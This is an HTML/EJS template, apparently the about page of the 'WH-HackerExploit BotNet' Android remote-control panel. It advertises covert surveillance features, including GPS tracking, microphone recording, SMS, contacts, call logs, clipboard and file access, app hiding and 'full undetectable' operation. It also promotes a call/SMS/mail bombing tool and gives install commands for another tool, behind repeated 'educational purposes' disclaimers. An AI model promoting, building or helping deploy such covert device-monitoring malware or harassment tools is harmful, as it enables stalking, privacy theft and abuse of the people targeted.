<html lang="en"><head>
  <meta charset="utf-8">
  <meta content="width=device-width, initial-scale=1.0" name="viewport">

  <title>WH-HackerExploit BotNet</title>
  <meta content="" name="descriptison">
  <meta content="" name="keywords">

  <!-- Favicons -->
<%- include ("partials/hade2.ejs") %>

  <!-- Template Main CSS File -->
  <link href="/css/abvendor/style.css" rel="stylesheet">

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
  <!-- =======================================================
  * Template Name: Selecao - v2.0.0
  * Template URL: https://bootstrapmade.com/selecao-bootstrap-template/
  * Author: BootstrapMade.com
  * License: https://bootstrapmade.com/license/
  ======================================================== -->
</head>

<body data-aos-easing="ease-in-out" data-aos-duration="1000" data-aos-delay="0">
<button type="button" class="mobile-nav-toggle d-lg-none">
<i class="bx bx-menu-alt-right"></i>
</button>
<button type="button" class="mobile-nav-toggle d-lg-none">
<i class="bx bx-menu-alt-right"></i>
</button>
<button type="button" class="mobile-nav-toggle d-lg-none">
<i class="bx bx-menu-alt-right"></i>
</button>
<button type="button" class="mobile-nav-toggle d-lg-none">
<i class="bx bx-menu-alt-right"></i>
</button>
<button type="button" class="mobile-nav-toggle d-lg-none">
<i class="bx bx-menu-alt-right"></i>
</button>
<button type="button" class="mobile-nav-toggle d-lg-none">
<i class="bx bx-menu-alt-right"></i>
</button>
<button type="button" class="mobile-nav-toggle d-lg-none">
<i class="bx bx-menu-alt-right"></i>
</button>
<button type="button" class="mobile-nav-toggle d-lg-none">
<i class="bx bx-menu-alt-right"></i>
</button>

  <!-- ======= Header ======= -->
  <header id="header" class="fixed-top d-flex align-items-center header-transparent header-scrolled">
    <div class="container d-flex align-items-center">

    <div class="logo">
          <a href="#"><img src="/css/abvendor/logo.jpg" title="Back to BootstrapThemes.io Homepage"></a>
        </div>

      <nav class="nav-menu d-none d-lg-block">
        <ul>
          <li class="Phone"><a href="/">Device</a></li>
          <li class=""><a href="builder">Apk Builder</a></li>
          <li class=""><a href="changepass">Change Password</a></li>
          <li class=""><a href="logs">Event Log</a></li>
         
         
          <li class=""><a href="logout">Logout</a></li>

        </ul>
      </nav><!-- .nav-menu -->

    </div>
  </header><!-- End Header -->

  <!-- ======= Hero Section ======= -->
  <section id="hero" class="d-flex justify-cntent-center align-items-center">
    <div id="heroCarousel" class="container carousel carousel-fade pointer-event" data-ride="carousel">

      <!-- Slide 1 -->
      <div class="carousel-item">
        <div class="carousel-container">
          <h2 class="animated fadeInDown">Welcome to <span>WH-HackerExploit</span></h2>
          <p class="animated fadeInUp">Such as the consumer wants to do a thing to another. To follow him, and seek his own, there is nothing to follow them; and you may have some options.</p>
          <a href="#about" class="btn-get-started animated fadeInUp scrollto">Read More</a>
        </div>
      </div>

      <!-- Slide 2 -->
      <div class="carousel-item active">
        <div class="carousel-container">
          <h2 class="animated fadeInDown">DISCLAIMER </h2>
          <p class="animated fadeInUp">Usage of WH-HackerExploit Hacking Tool for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes. </p>
          <a href="#about" class="btn-get-started animated fadeInUp scrollto">Read More</a>
        </div>
      </div>



      <a class="carousel-control-prev" href="#heroCarousel" role="button" data-slide="prev">
        <span class="carousel-control-prev-icon bx bx-chevron-left" aria-hidden="true"></span>
        <span class="sr-only">Previous</span>
      </a>

      <a class="carousel-control-next" href="#heroCarousel" role="button" data-slide="next">
        <span class="carousel-control-next-icon bx bx-chevron-right" aria-hidden="true"></span>
        <span class="sr-only">Next</span>
      </a>

    </div>
  </section><!-- End Hero -->



  <main id="main">

    <!-- ======= About Section ======= -->
    <section id="about" class="about">
      <div class="container">

        <div class="section-title aos-init aos-animate" data-aos="zoom-out">
          <h2>About</h2>
          <p>Who we are</p>
        </div>

        <div class="row content aos-init aos-animate" data-aos="fade-up">
          <div class="col-lg-6">
            <p>
             Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed tempor and vitality, so that the labor and sorrow, some important things to do eiusmod.
            </p>
            <ul>
              <li><i class="ri-check-double-line"></i> we are youtuber , we macke video for you .</li>
              <li><i class="ri-check-double-line"></i> we are Developer , we create Developer program for you .</li>
              <li><i class="ri-check-double-line"></i> we are Discover , we Discover  Tool and freamwork for you </li>
            </ul>
          </div>
          <div class="col-lg-6 pt-4 pt-lg-0">
            <p>
              Hi , I am Developer "R47" i'm are work for you , 
			  i'm already create more Repositories for you ,
			  but it's only educational purpose. you can check our Repositories in here.
            </p>
            <a href="https://github.com/wh-hackerexploit" class="btn-learn-more">Here</a>
          </div>
        </div>

      </div>
    </section><!-- End About Section -->

    <!-- ======= Features Section ======= -->
<section id="features" class="features" style="border: 1px solid rgba(105, 249, 7, 0.9);border-radius: .28571429rem;box-shadow: 0 1px 2px 0 rgb(63, 255, 5);background-color: #0ce33826;border-radius: 219px 17px 219px 17px;">
         <div class="container">

        

        <div class="tab-content aos-init aos-animate" data-aos="fade-up">
          <div class="tab-pane active show" id="tab-1">
            <div class="row">
              <div class="col-lg-6 order-2 order-lg-1 mt-3 mt-lg-0">
                <h3>Information of ( WH-HackerExploit BotNet )</h3>
                <p class="font-italic">
                 This is an android pentesting Framework , you can use very easily in any operating system .
                </p>
				<h3> List of system </h3>
                <ul>
                  <li><i class="ri-check-double-line"></i> Windows</li>
				  <li><i class="ri-check-double-line"></i> Kali-Linux</li>
				  <li><i class="ri-check-double-line"></i> Parrot OS</li>
				  <li><i class="ri-check-double-line"></i> Ubunto</li>
				  <li><i class="ri-check-double-line"></i> Mac Iso</li>
				  <li><i class="ri-check-double-line"></i> Android &gt; Termux.apk</li>
                  
					
				 </ul>
             	 
				<ul style="margin-left: 268px;margin-top: -299px;width: 85%;">
				<h3> Framework service </h3>
                  <li><i class="ri-check-double-line"></i> GPS ----------------------------- <i class="ri-check-double-line"></i> Microphone record  </li>
				  <li><i class="ri-check-double-line"></i> Contact ------------------------ <i class="ri-check-double-line"></i> Call log </li>
				  <li><i class="ri-check-double-line"></i> ClipboardLog ---------------- <i class="ri-check-double-line"></i> Notification log </li>
				  <li><i class="ri-check-double-line"></i> Sms Manager ---------------- <i class="ri-check-double-line"></i> Wifi Manager </li>
				  <li><i class="ri-check-double-line"></i> Installed apps info --------- <i class="ri-check-double-line"></i> Allowed Permission info </li>
				  <li><i class="ri-check-double-line"></i> File Explorer ------------------<i class="ri-check-double-line"></i> Download request tab </li>
				  <li><i class="ri-check-double-line"></i> auto app hide ---------------- <i class="ri-check-double-line"></i> Full Undetectable function </li>
                  
				  </ul>
				  <p class="font-italic">
            	 
				 
				 
				 
				 This is an android pentesting Framework 
				 coded by <a href="https://github.com/D3VL">( D3VL )</a>
				 and aslo Develop by <a href="https://github.com/wh-hackerexploit">Wh-HackerExploit</a> , We
				 are add some Services , that's like Change password , information bar or About us page .
				 
				 
				 
				 
				 
				 
                </p>
              </div>
              <div class="col-lg-6 order-1 order-lg-2 text-center" style="margin-left: 691px;margin-top: -467px;">
                <img src="/css/abvendor/features-1.png" alt="" class="img-fluid" style="">
              </div>
            </div>
          </div>
         
          
          
        </div>

      </div>
    </section><!-- End Features Section -->

    <!-- ======= Cta Section ======= -->
    <!-- End Cta Section -->

    <!-- ======= Services Section ======= -->
    <section id="services" class="services">
      <div class="container">

        <div class="section-title aos-init aos-animate" data-aos="zoom-out">
          <h2>Services</h2>
          <p>What we do offer</p>
        </div>

        <div class="row">
          <div class="col-lg-4 col-md-6">
            <div class="icon-box aos-init aos-animate" data-aos="zoom-in-left" style="background-color: #1ed26d5e;border: 2px solid rgba(249, 211, 7, 0.9);box-shadow: 0 1px 2px 0 rgb(63, 255, 5);border-radius: 1px 90px 1px 90px;">
    
              <h4 class="title"><a href="https://github.com/wh-hackerexploit/HackerExploit-v2">WH-HackerExploit-v2</a></h4>
                <p class="description">RELEASED frameworks Today [2019-12-22] [ WH-HackerExploit V-2.0.1 ] in GitHub <a href="https://github.com/wh-hackerexploit/HackerExploit-v2">{ Here }</a><a>  .</a></p><a>
		
				<p class="description">it has been most powerful ;</p>
				<p class="description">multipul Advance Framework.</p>
				<p class="description">This Framework can be access remotly</p>
				<p class="description">any ( Android / Windows / Mac / Linux ) in any whare .</p>
				<p class="description">Developer : R47 .</p>

				<p class="description">[ Disclaimer : This Framework only for educational purposes .
				</p><p class="description">we are not responsible for your any illegal attempt .]</p>
            </a></div><a>
          </a></div><a>
          </a><div class="col-lg-4 col-md-6 mt-5 mt-md-0"><a>
            </a><div class="icon-box aos-init aos-animate" data-aos="zoom-in-left" style="background-color: #1ed26d5e;border: 2px solid rgba(249, 211, 7, 0.9);box-shadow: 0 1px 2px 0 rgb(63, 255, 5);border-radius: 1px 90px 1px 90px;">
      
              </a><h4 class="title"><a></a><a href="https://github.com/wh-hackerexploit/WH-boomber">WH-Boomber</a></h4>
           
			 <p class="description"> WH - Boomber || Boombing &gt;&gt; call ; sms ; Mail .    </p>

				<p class="description">Advanced boombing system by WH-HackerExploit   </p>
				<p class="description">Developers: R47   </p>
				<p class="description">Youtube : <a href="https://youtu.be/7pThTrEPn1I" savefrom_lm_index="0" savefrom_lm="1">Here </a><span style="padding: 0; margin: 0; margin-left: 5px;"><a href="http://savefrom.net/?url=https%3A%2F%2Fyoutu.be%2F7pThTrEPn1I&amp;utm_source=ff&amp;utm_medium=extensions&amp;utm_campaign=link_modifier" target="_blank" title="Get a direct link" style="background-image: url(&quot;data:image/gif;base64,R0lGODlhEAAQAOZ3APf39+Xl5fT09OPj4/Hx8evr6/3+/u7u7uDh4OPi497e3t7e3/z8/P79/X3GbuXl5ubl5eHg4WzFUfb39+Pj4lzGOV7LOPz7+/n6+vn5+ZTLj9/e387Ozt7f3/7+/vv7/ISbePn5+m/JV1nRKXmVbkCnKVrSLDqsCuDh4d/e3uDn3/z7/H6TdVeaV1uSW+bn5v39/eXm5eXm5kyHP/f39pzGmVy7J3yRd9/f3mLEKkXCHJbka2TVM5vaZn6Wdfn6+YG/c/r5+ZO/jeLi41aHTIeageLn4f39/vr6+kzNG2PVM5i+lomdf2CXYKHVmtzo2YXNeDqsBebl5uHh4HDKWN3g3kKqEH6WeZHTXIPKdnSPbv79/pfmbE7PHpe1l4O8dTO5DODg4VDLIlKUUtzo2J7SmEWsLlG4NJbFjkrJHP7+/VK5Nfz8+zmnC3KKa+Hg4OHh4Y63j/3+/eDg4Ojo6P///8DAwP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAHcALAAAAAAQABAAAAfWgHd2g4SFhYJzdYqLjIpzgx5bBgYwHg1Hk2oNDXKDFwwfDF5NLmMtcStsn4MhGT8YS04aGmU1QRhIGYMTADQAQlAODlloAMYTgwICRmRfVBISIkBPKsqDBAREZmcVFhYVayUz2IMHB1dWOmImI2lgUVrmgwUFLzdtXTxKSSduMfSD6Aik48MGlx05SAykM0gKhAAPAhTB0oNFABkPHg5KMIBCxzlMQFQZMGBIggSDpsCJgGDOmzkIUCAIM2dOhEEcNijQuQDHgg4KOqRYwMGOIENIB90JBAA7&quot;); background-repeat: no-repeat; width: 16px; height: 16px; display: inline-block; border: medium none; text-decoration: none; padding: 0px; position: relative;" savefrom_lm="1" savefrom_lm_is_link="1"></a></span>   </p>
				<p class="description">Github : <a href="https://github.com/wh-hackerexploit/WH-boomber">Here</a>   </p>
				<p class="description">[ Disclaimer : This Framework only for educational purposes .
				</p><p class="description">we are not responsible for your any illegal attempt .]</p>
            </div>
          </div>

          <div class="col-lg-4 col-md-6 mt-5 mt-lg-0 ">
           <div class="icon-box aos-init aos-animate" data-aos="zoom-in-left" style="background-color: #1ed26d5e;border: 2px solid rgba(249, 211, 7, 0.9);box-shadow: 0 1px 2px 0 rgb(63, 255, 5);border-radius: 1px 90px 1px 90px;">
      
              <h4 class="title"><a href="https://github.com/wh-hackerexploit/wh-forward">WH-forward</a></h4>
              
			<p class="description">wh-forward &gt; Disclaimer</p>

			<p class="description">this tool only for educational purpose . Disclaimer: We are no responsibility any action .</p>

			<p class="description">if you want you use for educational purpose</p>
			<p class="description">HOW TO DOWNLOAD &amp; INSTALL</p>

			<p class="description">* git clone https://github.com/wh-hackerexploit/wh-forward.git</p>
			<p class="description">* chmod 777 *</p>
			<p class="description">* bash ./run.sh</p>

			<p class="description">Test on OS &gt; kali- Linux</p>

	

			<p class="description">Youtube video link : <a href="https://youtu.be/lxGGfCarV9o" savefrom_lm_index="0" savefrom_lm="1"> Here </a><span style="padding: 0; margin: 0; margin-left: 5px;"><a href="http://savefrom.net/?url=https%3A%2F%2Fyoutu.be%2FlxGGfCarV9o&amp;utm_source=ff&amp;utm_medium=extensions&amp;utm_campaign=link_modifier" target="_blank" title="Get a direct link" style="background-image: url(&quot;data:image/gif;base64,R0lGODlhEAAQAOZ3APf39+Xl5fT09OPj4/Hx8evr6/3+/u7u7uDh4OPi497e3t7e3/z8/P79/X3GbuXl5ubl5eHg4WzFUfb39+Pj4lzGOV7LOPz7+/n6+vn5+ZTLj9/e387Ozt7f3/7+/vv7/ISbePn5+m/JV1nRKXmVbkCnKVrSLDqsCuDh4d/e3uDn3/z7/H6TdVeaV1uSW+bn5v39/eXm5eXm5kyHP/f39pzGmVy7J3yRd9/f3mLEKkXCHJbka2TVM5vaZn6Wdfn6+YG/c/r5+ZO/jeLi41aHTIeageLn4f39/vr6+kzNG2PVM5i+lomdf2CXYKHVmtzo2YXNeDqsBebl5uHh4HDKWN3g3kKqEH6WeZHTXIPKdnSPbv79/pfmbE7PHpe1l4O8dTO5DODg4VDLIlKUUtzo2J7SmEWsLlG4NJbFjkrJHP7+/VK5Nfz8+zmnC3KKa+Hg4OHh4Y63j/3+/eDg4Ojo6P///8DAwP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAHcALAAAAAAQABAAAAfWgHd2g4SFhYJzdYqLjIpzgx5bBgYwHg1Hk2oNDXKDFwwfDF5NLmMtcStsn4MhGT8YS04aGmU1QRhIGYMTADQAQlAODlloAMYTgwICRmRfVBISIkBPKsqDBAREZmcVFhYVayUz2IMHB1dWOmImI2lgUVrmgwUFLzdtXTxKSSduMfSD6Aik48MGlx05SAykM0gKhAAPAhTB0oNFABkPHg5KMIBCxzlMQFQZMGBIggSDpsCJgGDOmzkIUCAIM2dOhEEcNijQuQDHgg4KOqRYwMGOIENIB90JBAA7&quot;); background-repeat: no-repeat; width: 16px; height: 16px; display: inline-block; border: medium none; text-decoration: none; padding: 0px; position: relative;" savefrom_lm="1" savefrom_lm_is_link="1"></a></span><a></a></p><a>
            </a></div><a>
          </a></div><a>
          <div class="col-lg-4 col-md-6 mt-5">
            
          </div>

          
          
        </a></div><a>

      </a></div><a>
    </a></section><!-- End Services Section --><!-- End Team Section -->

    <!-- ======= Contact Section ======= -->
    <section id="contact" class="contact">
      
    </section><!-- End Contact Section -->

  </main><!-- End #main -->

  <!-- ======= Footer ======= -->
  <footer id="footer">
    <div class="container">
      <h3>WH-HackerExploit</h3>
      <p>Usage of WH-HackerExploit Hacking Tool for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes. </p>
      <div class="social-links">
   
        <a href="https://www.facebook.com/wh.hackerexploit" class="facebook"><i class="bx bxl-facebook"></i></a>
		<a href="https://www.youtube.com/channel/UCj6ekUzjItnjP6T7I9r1WMA?sub_confirmation=1" class="Youtube"><i class="bx bxl-youtube"></i></a>
		<a href="https://github.com/wh-hackerexploit" class="GitHub"><i class="bx bxl-github"></i></a>
      </div>
      <div class="copyright">
        © Copyright <strong><span>Wh-HackerExploit</span></strong>. All Rights Reserved
      </div>
      <div class="credits">
        <!-- All the links in the footer should remain intact. -->
        <!-- You can delete the links only if you purchased the pro version. -->
        <!-- Licensing information: https://bootstrapmade.com/license/ -->
        <!-- Purchase the pro version with working PHP/AJAX contact form: https://bootstrapmade.com/selecao-bootstrap-template/ -->
        Designed by <a href="https://github.com/wh-hackerexploit">WH-HackerExploit</a>
      </div>
    </div>
  </footer><!-- End Footer -->

  <a href="#" class="back-to-top" style="display: inline;"><i class="ri-arrow-up-line"></i></a>

<%- include ("partials/mid.ejs") %>
 <!-- Template Main JS File -->
  <script src="/css/abvendor/main.js"></script><nav class="mobile-nav d-lg-none">

        <ul>
          <li class=""><a href="/">Device</a></li>
          <li class=""><a href="about">Apk Builder</a></li>
          <li class=""><a href="services">Change Password</a></li>
          <li class=""><a href="portfolio">Event Log</a></li>
         
         
          <li class=""><a href="contact">Logout</a></li>

        </ul>
      </nav><div class="mobile-nav-overly"></div><nav class="mobile-nav d-lg-none">
        <ul>
          <li class=""><a href="/">Device</a></li>
          <li class=""><a href="about">Apk Builder</a></li>
          <li class=""><a href="services">Change Password</a></li>
          <li class=""><a href="portfolio">Event Log</a></li>
         
         
          <li class=""><a href="contact">Logout</a></li>

        </ul>
      </nav><div class="mobile-nav-overly"></div><nav class="mobile-nav d-lg-none">
        <ul>
          <li class=""><a href="/">Device</a></li>
          <li class=""><a href="about">Apk Builder</a></li>
          <li class=""><a href="services">Change Password</a></li>
          <li class=""><a href="portfolio">Event Log</a></li>
         
         
          <li class=""><a href="contact">Logout</a></li>

        </ul>
      </nav><div class="mobile-nav-overly"></div><nav class="mobile-nav d-lg-none">
        <ul>
          <li class=""><a href="/">Device</a></li>
          <li class=""><a href="about">Apk Builder</a></li>
          <li class=""><a href="services">Change Password</a></li>
          <li class=""><a href="portfolio">Event Log</a></li>
         
         
          <li class=""><a href="contact">Logout</a></li>

        </ul>
      </nav><div class="mobile-nav-overly"></div><nav class="mobile-nav d-lg-none">
        <ul>
          <li class=""><a href="/">Device</a></li>
          <li class=""><a href="about">Apk Builder</a></li>
          <li class=""><a href="services">Change Password</a></li>
          <li class=""><a href="portfolio">Event Log</a></li>
         
         
          <li class=""><a href="contact">Logout</a></li>

        </ul>
      </nav><div class="mobile-nav-overly"></div><nav class="mobile-nav d-lg-none">
        <ul>
          <li class=""><a href="/">Device</a></li>
          <li class=""><a href="about">Apk Builder</a></li>
          <li class=""><a href="services">Change Password</a></li>
          <li class=""><a href="portfolio">Event Log</a></li>
         
         
          <li class=""><a href="contact">Logout</a></li>

        </ul>
      </nav><div class="mobile-nav-overly"></div>
	  <nav class="mobile-nav d-lg-none">
        <ul>
          <li class=""><a href="/">Device</a></li>
          <li class=""><a href="about">Apk Builder</a></li>
          <li class=""><a href="services">Change Password</a></li>
          <li class=""><a href="portfolio">Event Log</a></li>
         
         
          <li class=""><a href="contact">Logout</a></li>

        </ul>
      </nav><div class="mobile-nav-overly"></div><nav class="mobile-nav d-lg-none">
        <ul>
          <li class=""><a href="/">Device</a></li>
          <li class=""><a href="about">Apk Builder</a></li>
          <li class=""><a href="services">Change Password</a></li>
          <li class=""><a href="portfolio">Event Log</a></li>
         
         
          <li class=""><a href="contact">Logout</a></li>

        </ul>
      </nav><div class="mobile-nav-overly"></div>



</body></html>